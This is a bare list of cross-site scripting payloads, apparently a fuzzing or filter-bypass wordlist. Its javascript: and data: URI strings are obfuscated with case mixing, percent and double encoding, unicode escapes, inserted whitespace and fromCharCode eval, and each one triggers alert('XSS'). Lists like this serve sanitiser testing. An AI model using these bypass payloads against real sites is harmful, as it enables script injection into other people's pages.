javascript:alert('XSS')
javascript%3Aalert('XSS')
javascript:alert('XSS')
javascript:alert('XSS')
JaVaScRiPt:alert('XSS')
java\script:alert('XSS')
javascript%253Aalert('XSS')
javascript:+alert('XSS')
javascript:%0aalert('XSS')
java%73cript:alert('XSS')
%6A%61%76%61%73%63%72%69%70%74%3Aalert('XSS')
java%73cript%3Aalert('XSS')
javascript\x3Aalert('XSS')
javascript\u003Aalert('XSS')
java\x73cript\x3Aalert('XSS')
java\u0073cript\u003Aalert('XSS')
jav\u200aascript:alert('XSS')
javascript:alert('XSS')
jav\nascript:alert('XSS')
javascript:%0D%0Aalert('XSS')
jAvAsCrIpT%3aalert('XSS')
%6a%61%76%61%73%63%72%69%70%74%3Aalert('XSS')
javascript:alert('XSS')
javascript:/comment/alert('XSS')
javascript:alert(XSS)
javascript:window'alert'
javascript:%u0061lert('XSS')
java\u0073cript:alert('XSS')
ja" + "vasc" + "ript:alert('XSS')
javascript:eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))
javascript:alert(${'XSS'})
JaVaSc%72IpT:alert('XSS')
javascript:alert('XSS')
javascript:alert('XSS')
javascript\u003Aalert('XSS')
http://example.com#javascript:alert('XSS')
javascript:%0A%09alert('XSS')
data:text/html,<script>location.href='javascript:alert(XSS)'</script>
